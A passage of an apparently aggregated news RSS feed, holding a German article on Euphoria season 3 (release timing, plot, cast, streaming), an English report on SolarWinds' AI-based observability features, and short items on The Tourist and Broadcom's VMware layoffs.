<p>Nach dem wilden Finale von Staffel 2 warten Serien-Fans sehnsüchtig auf neue Folgen von “Euphoria”. Leider wird Levinsons Serie jedoch nicht so bald zurückkehren. Auch wenn die Macher noch immer dabei sind, das Drehbuch für Staffel 3 zu schreiben, haben wir bereits erste Informationen über die neuen Episoden der kontroversen Serie.</p>



<h2 class="wp-block-heading toc">Wann erscheint Euphoria Staffel 3?</h2>



<p>HBO hatte ursprünglich angekündigt, dass “Euphoria” im Jahr 2025 zurückkehren soll. In einem Interview mit Josh Horowitz von MTV verriet Darstellerin Sydney Sweeney, dass sie bald wieder am Set von “Euphoria” arbeiten werde.</p>



<figure class="wp-block-embed is-type-rich is-provider-twitter wp-block-embed-twitter"><div class="wp-block-embed__wrapper">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">THIS JUST IN: Filming for <a href="https://twitter.com/hashtag/Euphoria?src=hash&amp;ref_src=twsrc%5Etfw">#Euphoria</a> season 3 is about to begin 🚨<br><br>No days off for <a href="https://twitter.com/sydney_sweeney?ref_src=twsrc%5Etfw">@sydney_sweeney</a> after <a href="https://twitter.com/hashtag/SXSW?src=hash&amp;ref_src=twsrc%5Etfw">#SXSW</a> – catch her full <a href="https://twitter.com/ImmaculateMovie?ref_src=twsrc%5Etfw">@immaculatemovie</a> interview with <a href="https://twitter.com/joshuahorowitz?ref_src=twsrc%5Etfw">@joshuahorowitz</a>, coming soon. <a href="https://t.co/nzYr4VHkHS" rel="nofollow">pic.twitter.com/nzYr4VHkHS</a></p>— MTV (@MTV) <a href="https://twitter.com/MTV/status/1767692325403120077?ref_src=twsrc%5Etfw">March 12, 2024</a></blockquote>
</div></figure>



<p>Doch wenn wir den neuesten Informationen von HBO glauben, dann werden die Dreharbeiten zu Staffel 3 nicht so bald beginnen. Das Drehbuch für die neuen Episoden ist noch nicht fertig. Da die Darsteller zwischenzeitlich an anderen Projekten arbeiten dürfen, ist unklar, wann das Drehbuch final sein wird. Dennoch ist HBO nach wie vor entschlossen, die Serie fortzusetzen, wie eine Sprecherin gegenüber <a href="https://variety.com/2024/tv/news/euphoria-season-3-delayed-hbo-1235950931/" target="_blank" rel="nofollow">Variety</a> erklärte:</p>



<blockquote class="wp-block-quote">
<p></p>
<cite>“HBO und Sam Levinson sind weiterhin entschlossen, eine außergewöhnliche dritte Staffel zu produzieren. In der Zwischenzeit erlauben wir unseren gefragten Darstellern, anderen Möglichkeiten nachzugehen.”</cite></blockquote>



<p>Ob “Euphoria” mit Staffel 3 wie bislang geplant im Jahr 2025 startet, bleibt also abzuwarten. </p>



<h2 class="wp-block-heading toc">Die Handlung von Staffel 3</h2>



<p><em>Achtung: Spoiler für </em>“<em>Euphoria</em>“<em> Staffel 2 in den folgenden Absätzen.</em></p>



<p>In der zweiten Staffel von “Euphoria” gab es wieder einige dramatische Wendungen. Die Romanze von Cassie und Nate führte zu einem turbulenten Ende der Freundschaft zwischen Cassie und Maddy. Nate selbst zeigte seinen Vater Cal bei der Polizei an, der wegen des Besitzes von jugendgefährdendem Material verhaftet wurde.</p>



<p>Der Höhepunkt der Staffel war ein Schultheaterstück, das Lexi vorbereitet hatte. Es wurde von ihrem und dem Leben ihrer Klassenkameraden inspiriert. Die urkomische Aufführung hatte jedoch unvorhergesehene Folgen. Ein wütender Nate trennte sich von Cassie, die daraufhin die Bühne betrat und von einer rachsüchtigen Maddy angegriffen wurde.</p>



<p>Leider schaffte es Fez, der sich während der Staffel mit Lexi angefreundet hatte, nicht zur Show. Kurz zuvor gerieten der Dealer und sein Bruder Ashtray in eine Schießerei mit der Polizei. Infolgedessen wurde Fez verwundet und Ash getötet. Das einzig positive Element am Ende der Staffel war die Versöhnung von Rue mit Jules und Elliot nach ihrer dramatischen Drogenkrise.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{ "core":
					{ "image":
						{   "imageLoaded": false,
							"initialized": false,
							"lightboxEnabled": false,
							"hideAnimationEnabled": false,
							"preloadInitialized": false,
							"lightboxAnimation": "zoom",
							"imageUploadedSrc": "",
							"imageCurrentSrc": "",
							"targetWidth": "none",
							"targetHeight": "none",
							"scaleAttr": "",
							"dialogLabel": "Enlarged image"
						}
					}
				}' data-wp-interactive class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-effect--setstylesonresize="effects.core.image.setStylesOnResize" data-wp-effect="effects.core.image.setButtonStyles" data-wp-init="effects.core.image.initOriginImage" data-wp-on--click="actions.core.image.showLightbox" data-wp-on--load="actions.core.image.handleLoad" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Euphoria - Jules" class="wp-image-2274853" srcset="https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?quality=50&amp;strip=all 1600w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Euphoria - Jules" data-wp-on--click="actions.core.image.showLightbox" data-wp-style--right="context.core.image.imageButtonRight" data-wp-style--top="context.core.image.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button>		<div data-wp-body="" class="wp-lightbox-overlay zoom" data-wp-bind--role="selectors.core.image.roleAttribute" data-wp-bind--aria-label="selectors.core.image.dialogLabel" data-wp-class--initialized="context.core.image.initialized" data-wp-class--active="context.core.image.lightboxEnabled" data-wp-class--hideanimationenabled="context.core.image.hideAnimationEnabled" data-wp-bind--aria-modal="selectors.core.image.ariaModal" data-wp-effect="effects.core.image.initLightbox" data-wp-on--keydown="actions.core.image.handleKeydown" data-wp-on--touchstart="actions.core.image.handleTouchStart" data-wp-on--touchmove="actions.core.image.handleTouchMove" data-wp-on--touchend="actions.core.image.handleTouchEnd" data-wp-on--click="actions.core.image.hideLightbox" tabindex="-1">
				<button type="button" aria-label="Close" class="close-button" data-wp-on--click="actions.core.image.hideLightbox">
					<svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24" width="20" height="20" aria-hidden="true" focusable="false"><path d="M13 11.8l6.1-6.3-1-1-6.1 6.2-6.1-6.2-1 1 6.1 6.3-6.5 6.7 1 1 6.5-6.6 6.5 6.6 1-1z"></path></svg>
				</button>
				<div class="lightbox-image-container"><div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large responsive-image"><img decoding="async" data-wp-bind--src="context.core.image.imageCurrentSrc" data-wp-style--object-fit="selectors.core.image.lightboxObjectFit" src="https://www.pcwelt.de/article/2279792/euphoria-staffel-3.html" alt="Euphoria - Jules" class="wp-image-2274853" srcset="https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?quality=50&amp;strip=all 1600w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"></figure><p class="imageCredit">HBO</p></div>
</div>
				<div class="lightbox-image-container foundry-lightbox"><div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large enlarged-image"><img decoding="async" data-wp-bind--src="selectors.core.image.enlargedImgSrc" data-wp-style--object-fit="selectors.core.image.lightboxObjectFit" src="https://www.pcwelt.de/article/2279792/euphoria-staffel-3.html" alt="Euphoria - Jules" class="wp-image-2274853" srcset="https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?quality=50&amp;strip=all 1600w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Jules.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"></figure><p class="imageCredit">HBO</p></div>
</div>
				<div class="scrim" aria-hidden="true"></div>
		</div></figure><p class="imageCredit">HBO</p></div>



<p>Wer hofft, dass die neue Staffel direkt nach der chaotischen Schulaufführung weitergeht, wird eventuell enttäuscht. <a href="https://www.vogue.com/article/heidi-bivens-euphoria-fashion-book-interview" target="_blank" rel="nofollow">Laut der Kostümdesignerin Heidi Bivens</a> wird es zwischen den Staffeln einen Zeitsprung von bis zu 5 Jahren in die Zukunft geben. Das heißt, wenn wir Rue und ihre Mitschüler das nächste Mal sehen, werden sie junge Erwachsene sein.</p>



<p>Auf die Frage nach Staffel 3 <a href="https://www.elle.com/culture/movies-tv/a44763838/zendaya-interview-september-2023/" target="_blank" rel="nofollow">verriet Sam Levinson gegenüber Elle</a>, dass er die Konvention des Film Noir nutzen wollte, um “die Geschichte von Rue zu erzählen, die erforscht, was es bedeutet, ein Individuum mit Prinzipien in einer korrupten Welt zu sein.”</p>



<h2 class="wp-block-heading toc">Die Besetzung von “Euphoria” Staffel 3</h2>



<p>In der nächsten Folge der Serie können wir die Rückkehr der folgenden Darsteller erwarten:</p>



<ul>
<li><strong>Zendaya </strong>– Rue</li>



<li><strong>Hunter Schafer </strong>– Jules</li>



<li><strong>Sydney Sweeney – </strong>Cassie</li>



<li><strong>Jacob Elordi </strong>– Nate</li>



<li><strong>Alexa Demie </strong>– Maddy</li>



<li><strong>Maude Apatow –</strong> Lexi</li>



<li><strong>Storm Reid </strong>– Gia</li>



<li><strong>Dominic Fike –</strong> Elliot</li>



<li><strong>Nika King – </strong>Leslie</li>



<li><strong>Eric Dane –</strong> Cal</li>



<li><strong>Colman Domingo –</strong> Ali</li>



<li><strong>Austin Abrams </strong>– Ethan</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{ "core":
					{ "image":
						{   "imageLoaded": false,
							"initialized": false,
							"lightboxEnabled": false,
							"hideAnimationEnabled": false,
							"preloadInitialized": false,
							"lightboxAnimation": "zoom",
							"imageUploadedSrc": "",
							"imageCurrentSrc": "",
							"targetWidth": "none",
							"targetHeight": "none",
							"scaleAttr": "",
							"dialogLabel": "Enlarged image"
						}
					}
				}' data-wp-interactive class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-effect--setstylesonresize="effects.core.image.setStylesOnResize" data-wp-effect="effects.core.image.setButtonStyles" data-wp-init="effects.core.image.initOriginImage" data-wp-on--click="actions.core.image.showLightbox" data-wp-on--load="actions.core.image.handleLoad" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Euphoria - Cassie" class="wp-image-2274855" srcset="https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?quality=50&amp;strip=all 1600w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Euphoria - Cassie" data-wp-on--click="actions.core.image.showLightbox" data-wp-style--right="context.core.image.imageButtonRight" data-wp-style--top="context.core.image.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button>		<div data-wp-body="" class="wp-lightbox-overlay zoom" data-wp-bind--role="selectors.core.image.roleAttribute" data-wp-bind--aria-label="selectors.core.image.dialogLabel" data-wp-class--initialized="context.core.image.initialized" data-wp-class--active="context.core.image.lightboxEnabled" data-wp-class--hideanimationenabled="context.core.image.hideAnimationEnabled" data-wp-bind--aria-modal="selectors.core.image.ariaModal" data-wp-effect="effects.core.image.initLightbox" data-wp-on--keydown="actions.core.image.handleKeydown" data-wp-on--touchstart="actions.core.image.handleTouchStart" data-wp-on--touchmove="actions.core.image.handleTouchMove" data-wp-on--touchend="actions.core.image.handleTouchEnd" data-wp-on--click="actions.core.image.hideLightbox" tabindex="-1">
				<button type="button" aria-label="Close" class="close-button" data-wp-on--click="actions.core.image.hideLightbox">
					<svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24" width="20" height="20" aria-hidden="true" focusable="false"><path d="M13 11.8l6.1-6.3-1-1-6.1 6.2-6.1-6.2-1 1 6.1 6.3-6.5 6.7 1 1 6.5-6.6 6.5 6.6 1-1z"></path></svg>
				</button>
				<div class="lightbox-image-container"><div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large responsive-image"><img decoding="async" data-wp-bind--src="context.core.image.imageCurrentSrc" data-wp-style--object-fit="selectors.core.image.lightboxObjectFit" src="https://www.pcwelt.de/article/2279792/euphoria-staffel-3.html" alt="Euphoria - Cassie" class="wp-image-2274855" srcset="https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?quality=50&amp;strip=all 1600w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"></figure><p class="imageCredit">HBO</p></div>
</div>
				<div class="lightbox-image-container foundry-lightbox"><div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large enlarged-image"><img decoding="async" data-wp-bind--src="selectors.core.image.enlargedImgSrc" data-wp-style--object-fit="selectors.core.image.lightboxObjectFit" src="https://www.pcwelt.de/article/2279792/euphoria-staffel-3.html" alt="Euphoria - Cassie" class="wp-image-2274855" srcset="https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?quality=50&amp;strip=all 1600w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2024/03/Euphoria-Cassie.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"></figure><p class="imageCredit">HBO</p></div>
</div>
				<div class="scrim" aria-hidden="true"></div>
		</div></figure><p class="imageCredit">HBO</p></div>



<p>Leider wird Angus Cloud, der den Fan-Liebling Fezco spielte, in Staffel 3 nicht zurückkehren. Im Juli 2023 <a href="https://variety.com/2023/film/news/angus-cloud-dead-1235684089/" target="_blank" rel="nofollow">verstarb der Schauspieler</a> im Alter von 25 Jahren an einer Überdosis. Es ist noch unklar, wie die Macher der Serie die Abwesenheit von Fezco in der kommenden Staffel erklären werden. In den neuen Episoden werden wir auch Javon Walton als Ashtray wahrscheinlich nicht wiedersehen. Fez’ Bruder wurde höchstwahrscheinlich während der Schießerei mit der Polizei getötet.</p>



<p>Im Jahr 2022 gab Barbie Ferreira, die die Rolle der Kat Hernandez spielte, bekannt, dass sie <a href="https://www.vanityfair.com/hollywood/2023/04/barbie-ferreira-left-euphoria-because-she-didnt-want-to-be-the-fat-best-friend" target="_blank" rel="nofollow">die Serie verlassen wird</a>. Der Grund: So wolle nicht mehr die “fette beste Freundin” spielen. Auch sie wird also in Staffel 3 wahrscheinlich nicht zu sehen sein. </p>



<h2 class="wp-block-heading toc">Gibt es einen Trailer zu “Euphoria” Staffel 3?</h2>



<p>Es gibt leider noch keinen Trailer für Staffel 3. Aber wenn Sie “Euphoria” wirklich vermissen, können Sie die Serie auch bei <a href="http://buy.geni.us/Proxy.ashx?TSID=319187&amp;GR_URL=https://www.amazon.de/Euphoria-Season-2/dp/B09T5M1QY8?ascsubtag=6-1-2279792-1-0-0" target="_blank" rel="nofollow">Amazon Prime Video kaufen</a> oder auf <a href="https://www.awin1.com/cread.php?awinmid=23467&amp;awinaffid=486277&amp;clickref=6-1-2279792-1-0-0&amp;platform=dl&amp;ued=https://www.wowtv.de/serien/euphoria" target="_blank" rel="nofollow">Wow streamen</a>. Nachfolgend finden Sie den Trailer für die zweite Staffel:</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading">Wie Sie die Staffeln 1 und 2 von Euphoria sehen können</h2>



<p>In Deutschland ist “Euphoria” beim Streaming-Anbieter <a href="https://www.awin1.com/cread.php?awinmid=23467&amp;awinaffid=486277&amp;clickref=6-1-2279792-1-0-0&amp;platform=dl&amp;ued=https://www.wowtv.de/serien/euphoria" target="_blank" rel="nofollow">Wow</a> verfügbar. Staffel 1 und 2 mit jeweils 8 Episoden stehen als Teil des <a href="https://www.awin1.com/cread.php?awinmid=23467&amp;awinaffid=486277&amp;clickref=6-1-2279792-1-0-0&amp;platform=dl&amp;ued=https://www.wowtv.de/waehle-dein-abo/filme-serien/c" target="_blank" rel="nofollow">Wow-Abos Filme &amp; Serien</a> bereit. Es kostet monatlich 9,98 Euro. Wer auf Werbung verzichten will und Inhalte in Full HD und mit Dolby 5.1 Surround Sound streamen möchte, sollte für 5 Euro monatlich die Premium-Option hinzubuchen. </p>



<p>Sie können Euphoria aber auch bei <a href="http://buy.geni.us/Proxy.ashx?TSID=319187&amp;GR_URL=https://www.amazon.de/Euphoria-Season-2/dp/B09T5M1QY8?ascsubtag=6-1-2279792-1-0-0" target="_blank" rel="nofollow">Amazon Prime Video </a>ansehen. Die Staffel müssen Sie allerdings kaufen, sie sind nicht im Prime-Abo enthalten. Die Staffeln kosten aktuell jeweils 9,99 Euro.</p>



<p>Dieser Artikel erschien im Original bei unserer Schwesternpublikation Techadvisor und wurde von uns übersetzt und angepasst. </p>

<category>Streaming Media</category></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SolarWinds amps up observability software with AI]]></title>
<description><![CDATA[SolarWinds added AI-based enhancements to its observability solutions that will enable IT teams to more easily monitor complex, distributed on-premises and cloud environments from anywhere. The upgrades promise to provide visibility into gaps created when workloads are moved from on-premises to c...]]></description>
<link>https://tsecurity.de/de/2050124/it-security-nachrichten/solarwinds-amps-up-observability-software-with-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2050124/it-security-nachrichten/solarwinds-amps-up-observability-software-with-ai/</guid>
<pubDate>Wed, 28 Feb 2024 19:20:26 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>SolarWinds added AI-based enhancements to its <a href="https://www.networkworld.com/article/971577/solarwinds-observability-offers-visibility-into-hybrid-cloud-infrastructure.html" target="_blank" rel="noreferrer noopener">observability solutions</a> that will enable IT teams to more easily monitor complex, distributed on-premises and cloud environments from anywhere. The upgrades promise to provide visibility into gaps created when workloads are moved from on-premises to cloud environments, helping IT teams spot and prevent performance incidents.</p>



<p>SolarWinds Observability is a SaaS offering that the company says provides visibility across the cloud-native, on-prem, and hybrid technology stack to speed problem resolution and reduce the noise of multiple system alerts for IT professionals. It also can deliver a view across multi-cloud environments, alongside on-premises network and infrastructure assets.</p>



<p>âWe are giving our users the ability to not only have cloud visibility but also that on-premises network and infrastructure visibility by connecting those together,â says Jeff Stewart, field CTO and vice president, global solutions engineering, observability at SolarWinds. âGiving our customers insight into that level of detail even across the telco networks has been pretty significant.â</p>



<p>As part of its Hybrid Cloud Observability (HCO) capabilities, SolarWinds supports Azure and AWS and is able to see into those environments, letting IT teams look at what is happening outside of their own networks. Whether IT professionals are being mandated to move workloads to the cloud or they are doing it naturally, SolarWinds will be able to give them a view into activity between on-prem and cloud environments. âWe provide visibility into applications that are cloud-native but also the performance connected down to the end user themselves,â Stewart explains.</p>



<p>SolarWinds observability can provide visibility across on-premises and cloud network devices, virtual machines, hypervisors, containers, Kubernetes, and infrastructure-as-a-service resources.</p>



<p>âSolarWinds also recently upgraded their cloud-native Kubernetes and container support. This helps with the expansion to CloudOps and cloud-native-centricÂ teams and buyers,â says Stephen Elliot, Group Vice President at IDC.</p>



<p>With this release, AIOps-enabled pattern recognition and anomaly detection can provide insights into correlated alerts and events to accelerate root cause analysis, helping IT teams to be more productive. SolarWinds also extended its observability capabilities by adding query explorer and visual explain plans.</p>



<p>âBuilt into the AI-based platform, we are doing things such as health score analysis, which looks at all the entities of a particular day, application stack, or technology stack, and provides a score based off of performance,â Stewart explains. âWe are also applying AI and [machine learning] to look at nominal anomalies and seasonality to really try to reduce what IT teams must focus on to the most important things. Essentially, hereâs what is healthy, and here is what you need to look at more closely.â</p>



<p>The recent updates point to SolarWindsâ efforts to expand from a product company to a platform provider, according to industry watchers.</p>



<p>âSolarWinds is moving from a product to a platform capability story.  They are expanding their communities from IT operations to include a plethora of buyers across technology domains (site reliability engineers, DevOps, security, server management, CloudOps),â Elliot says. âThe company has been transforming business functions across product and pricing models (from perpetual to SaaS and subscription delivery models) under CEO Sudhakar Ramakrishna who joined just over three years ago.â</p>



<p>The updated capabilities are available now, with both perpetual and subscription licensing options for customers. âWe have also made enhancements to the licensing and deployment model allowing flexibility and simplicity for customers,â Stewart added.</p>



<p>SolarWinds will share more details about the enhancements to its observability solutions including hybrid on-prem and cloud visibility capabilities during its virtual event, <a href="https://www.solarwinds.com/solarwinds-day" target="_blank" rel="noreferrer noopener">SolarWinds Day</a>, this week.</p>
</div></div></div><category>Data Center, Generative AI, Network Management Software</category>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Tourist: Wird es eine dritte Staffel der BBC- und ZDF-Serie geben?]]></title>
<description><![CDATA[Kehrt die BBC-Serie "The Tourist" mit einer dritten Staffel zurück? Kann der an Amnesie leidende Elliot (Jamie Dornan) endlich alle Geheimnisse seiner mysteriösen Vergangenheit herausfinden? Das könnte uns in den neuen Folgen erwarten.
																					Dieser Artikel wurde einsortiert unter 
...]]></description>
<link>https://tsecurity.de/de/2042140/it-nachrichten/the-tourist-wird-es-eine-dritte-staffel-der-bbc-und-zdf-serie-geben/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2042140/it-nachrichten/the-tourist-wird-es-eine-dritte-staffel-der-bbc-und-zdf-serie-geben/</guid>
<pubDate>Thu, 22 Feb 2024 11:18:53 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kehrt die BBC-Serie "The Tourist" mit einer dritten Staffel zurück? Kann der an Amnesie leidende Elliot (Jamie Dornan) endlich alle Geheimnisse seiner mysteriösen Vergangenheit herausfinden? Das könnte uns in den neuen Folgen erwarten.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/zdf.html">ZDF</a>,																	<a href="https://www.netzwelt.de/netflix/index.html">Netflix</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/bbc-one.html">BBC One</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/hbo-max/index.html">HBO Max</a>,																	<a href="https://www.netzwelt.de/serien/the-tourist/index.html">The Tourist: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/tv-sender/bbc-iplayer.html">BBC iPlayer</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Broadcom’s VMware alterations include layoffs, changes to partner programs]]></title>
<description><![CDATA[Broadcom finally closed its acquisition of VMware in November after 18 months of various governments slow-walking the approval process. Now it's making a series of changes, including layoffs, that may prove painful.



Layoffs aren't a surprise, as Broadcom wasn't quiet about plans to cut headcou...]]></description>
<link>https://tsecurity.de/de/1979247/it-security-nachrichten/broadcoms-vmware-alterations-include-layoffs-changes-to-partner-programs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1979247/it-security-nachrichten/broadcoms-vmware-alterations-include-layoffs-changes-to-partner-programs/</guid>
<pubDate>Fri, 05 Jan 2024 19:06:57 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Broadcom finally closed its acquisition of VMware in November after 18 months of various governments slow-walking the approval process. Now it's making a series of changes, including layoffs, that may prove painful.</p>



